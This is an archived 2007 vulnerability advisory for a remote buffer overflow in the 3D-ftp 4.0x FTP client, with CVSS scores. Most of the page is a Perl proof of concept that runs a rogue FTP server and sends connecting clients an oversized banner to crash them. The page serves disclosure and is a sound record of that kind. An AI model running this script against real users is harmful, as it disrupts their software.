Buffer overflow in 3D-ftp

2007.10.25
Credit: Over_G
Risk: High
Local: No
Remote: Yes
CWE: N/A


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

Product: 3D-ftp Client Version: 4.0x OffSite: http://www.sitegallery.net/ Problem: Remote buffer overflow ------------------------------------------ 3D-ftp - Quite good Windows FTP Client. FTP Client have many opportunities Remote buffer overflow will take place if server send long banner >= 8192 Client can not process these data and he is crash! Fix: Download new version. Sample exploit in perl. For Crash 3D-ftp use: ftpbanex.pl 8193 #!/usr/bin/perl ######################################################## # # Banner Buffer Overflow remote exploit in FTP Clients # # # by Over_G [DWC Gr0up] # # www.dwcgr0up.com www.overg.com ######################################################### use IO::Socket; $port = "21"; $data = "a"; $bsize = $ARGV[0]; print "\n Banner Buffer Overflow remote exploit in FTP Clients\n\n"; print " by Over G[DWC Gr0up]\n"; print " www.dwcgr0up.com www.overg.com\n\n"; if (defined $bsize) {} else { print "Incorrect parameters.\n"; die "Usage: perl ftpbanex.pl [buffer_size]\n"; } print "Creating server...\n"; $buf .= $data x $bsize; $server = IO::Socket::INET->new(LocalPort => $port, Type => SOCK_STREAM, Reuse => 1, Listen => 2) or die "Couldn't create server.\n"; print "Awayting connections...\n"; while ($client = $server->accept()) { print "Client connected.\n"; print "Attacking..."; print $client "$buf"; print "OK\n"; close($client); } Greetz to: DHGroup, Gipshack. www.overg.com www.dwcgr0up.com regards, Over G[DWC Gr0up]


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top